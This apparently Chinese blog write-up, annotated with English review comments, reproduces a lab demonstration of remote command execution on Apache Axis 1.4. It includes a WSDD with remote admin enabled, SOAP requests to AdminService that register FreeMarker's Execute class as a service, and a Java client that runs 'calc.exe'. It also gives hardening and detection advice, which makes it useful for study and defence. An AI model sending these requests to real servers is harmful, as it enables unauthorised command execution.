<!-- Servlet deployment descriptor (web.xml) fragment: registers the Axis 1.x servlet. -->
<servlet>
  <servlet-name>AxisServlet</servlet-name>
  <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
</servlet>
<!-- URL path under which the services are reached. Every service Axis deploys,
     including the built-in AdminService shown in the WSDD below, is exposed under
     this one mapping, so access control for AdminService must come from the WSDD
     (enableRemoteAdmin) or from a container-level constraint on /services/AdminService. -->
<servlet-mapping>
  <servlet-name>AxisServlet</servlet-name>
  <url-pattern>/services/*</url-pattern>
</servlet-mapping>
// --- SayHello.java ---
package com.zhutougg.axis;

/**
 * Contract of the greeting service that the WSDD on this page exposes as the
 * "sayHello" RPC service.
 */
public interface SayHello {
    /**
     * Builds a greeting for the supplied name.
     *
     * @param name caller-supplied name; it is echoed back verbatim in the reply
     * @return the greeting text
     */
    public String say(String name);
}

// --- SayHelloImpl.java ---
package com.zhutougg.axis;

/**
 * Default {@link SayHello} implementation: a fixed prefix followed by the name.
 *
 * Note: the WSDD deploys this class with allowedMethods="*", so every public
 * method added here becomes a remotely callable SOAP operation.
 */
public class SayHelloImpl implements SayHello {
    private static final String GREETING_PREFIX = "Hello my friend ";

    @Override
    public String say(String name) {
        // StringBuilder.append(String) renders a null name as "null", exactly
        // like string concatenation does, so behaviour is unchanged.
        StringBuilder greeting = new StringBuilder(GREETING_PREFIX);
        greeting.append(name);
        return greeting.toString();
    }
}
<?xml version="1.0" encoding="UTF-8"?>
<!-- Axis WSDD deployment descriptor: global handlers, the built-in services,
     the transports, and the application's own service at the bottom. -->
<deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  <handler name="URLMapper" type="java:org.apache.axis.handlers.http.URLMapper"/>
  <handler name="LocalResponder" type="java:org.apache.axis.transport.local.LocalResponder"/>
  <!-- Declared, but not referenced by any requestFlow/responseFlow in this file,
       so this handler is never executed. -->
  <handler name="Authenticate" type="java:org.apache.axis.handlers.SimpleAuthenticationHandler"/>
  <!-- NOTE(review): enableRemoteAdmin="true" makes AdminService accept <deployment>
       documents POSTed from remote hosts. The AdminService requests later on this page
       use exactly that to register an arbitrary server-side class as an RPC service.
       On any network-reachable deployment set this to "false" (or remove the service),
       and alert on POST requests to /services/AdminService whose body contains a
       <deployment> element. -->
  <service name="AdminService" provider="java:MSG">
    <parameter name="allowedMethods" value="AdminService"/>
    <parameter name="enableRemoteAdmin" value="true"/>
    <parameter name="className" value="org.apache.axis.utils.Admin"/>
    <namespace>http://xml.apache.org/axis/wsdd/</namespace>
  </service>
  <service name="Version" provider="java:RPC">
    <parameter name="allowedMethods" value="getVersion"/>
    <parameter name="className" value="org.apache.axis.Version"/>
  </service>
  <transport name="http">
    <requestFlow>
      <handler type="URLMapper"/>
      <!-- Only extracts HTTP credentials; nothing in this flow rejects a request. -->
      <handler type="java:org.apache.axis.handlers.http.HTTPAuthHandler"/>
    </requestFlow>
    <!-- Query-string handlers (?list, ?wsdl, ?method); ?list enumerates every deployed service. -->
    <parameter name="qs:list" value="org.apache.axis.transport.http.QSListHandler"/>
    <parameter name="qs:wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/>
    <parameter name="qs.list" value="org.apache.axis.transport.http.QSListHandler"/>
    <parameter name="qs.method" value="org.apache.axis.transport.http.QSMethodHandler"/>
    <parameter name="qs:method" value="org.apache.axis.transport.http.QSMethodHandler"/>
    <parameter name="qs.wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/>
  </transport>
  <transport name="local">
    <responseFlow>
      <handler type="LocalResponder"/>
    </responseFlow>
  </transport>
  <!-- The application's own service. -->
  <service name="sayHello" provider="java:RPC">
    <parameter name="className" value="com.zhutougg.axis.SayHelloImpl" />
    <!-- NOTE(review): "*" exposes every public method of the class over SOAP.
         List the intended operations explicitly instead, e.g. value="say". -->
    <parameter name="allowedMethods" value="*" />
  </service>
</deployment>
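/**
 * Minimal Axis client for the "sayHello" RPC service deployed by the WSDD above.
 *
 * @param args unused
 * @throws Exception propagated from the Axis call (connection or SOAP fault)
 */
public static void main(String[] args) throws Exception {
    // Fixed: the original literal contained a stray space after "http://",
    // which is not a valid URL and would make the call fail before it is sent.
    String wsdlAddress = "http://10.31.12.231:8888/AxisProject/services/sayHello?wsdl";
    Service service = new Service();
    Call call = (Call) service.createCall();
    call.setTargetEndpointAddress(wsdlAddress);
    // RPC-style invocation: operation name plus positional arguments.
    String val = (String) call.invoke("say", new Object[] {"aaaaaaa"});
    // Fixed: "/n" was a literal slash-n; "\n" is the intended line break.
    System.out.println("这是webservice服务器返回的信息:\n" + val);
}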
POST /AxisProject/services/sayHello?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 442 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><say soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">aaaaaaa</arg0></say></soapenv:Body></soapenv:Envelope>
http://axis.apache.org/axis/java/user-guide.html
POST /AxisProject/services/AdminService?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 588 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <service name="MyService" provider="java:RPC"> <parameter name="className" value="samples.userguide.example3.MyService"/> <parameter name="allowedMethods" value="*"/> </service> </deployment></soapenv:Body></soapenv:Envelope>
http://10.31.12.231:8888/AxisProject/services
链接,发现提示我们刚刚添加的类名找不着。而之前的漏洞通报 https://www.gdcert.com.cn/index/news_detail/W1BZRDEYCh0cDRkcGw
中提示到使用Freemarker插件的前提下才会存在漏洞,故推测使用freemarker.template.utility.Execute.exec(List arguments)方法执行命令,参考链接 https://blog.csdn.net/weixin_33967071/article/details/89831707
而Axis自带的jar包中并不包括这个文件,所以这里需要手动将该JAR包加到项目中
POST /AxisProject/services/AdminService?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 594 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Body> <deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <service name="freemarker" provider="java:RPC"> <parameter name="className" value="freemarker.template.utility.Execute"/> <parameter name="allowedMethods" value="*"/> </service> </deployment> </soapenv:Body></soapenv:Envelope>
/**
 * Client side of the AdminService finding described on this page: after the
 * preceding AdminService POST registered freemarker.template.utility.Execute as
 * an RPC service, its exec(List) method is reachable as a SOAP operation.
 *
 * Defensive takeaways, all visible in the WSDD above: AdminService must not be
 * remotely reachable (enableRemoteAdmin="false" or the service removed), and
 * allowedMethods="*" should never be used on a deployed class. Detection: POSTs
 * to /services/AdminService carrying a <deployment> body, and services appearing
 * under /services that are not part of the application's own WSDD.
 *
 * @param args unused
 * @throws Exception propagated from the Axis call
 */
public static void main(String[] args) throws Exception {
    // Endpoint created by the "freemarker" deployment request shown above.
    String wsdlAddress = "http://10.31.12.231:8888/AxisProject/services/freemarker?wsdl";
    Service service = new Service();
    Call call = (Call) service.createCall();
    call.setTargetEndpointAddress(wsdlAddress);
    // Argument list handed to Execute.exec on the server (see the SOAP capture below).
    List<String> list = new ArrayList<String>();
    list.add("calc.exe");
    String val = (String) call.invoke("exec", new Object[] {list});
    // NOTE: "/n" is a literal slash-n, not a newline.
    System.out.println("这是webservice服务器返回的信息:/n" + val);
}
POST /AxisProject/services/freemarker?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 645 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 href="#id0"/></exec><multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><multiRef xsi:type="soapenc:string">calc.exe</multiRef></multiRef></soapenv:Body></soapenv:Envelope>
之前就有看到这个漏洞,感觉比较鸡肋就懒得写文章,但是看到 https://xz.aliyun.com/t/5513 这篇文章之后,觉得既然要写,就要写清楚,每一步是怎么来的。
最后我并不觉得这个是漏洞,而是Axis提供正常的功能而已。
最后的最后,这里有个二维码,希望大家扫一下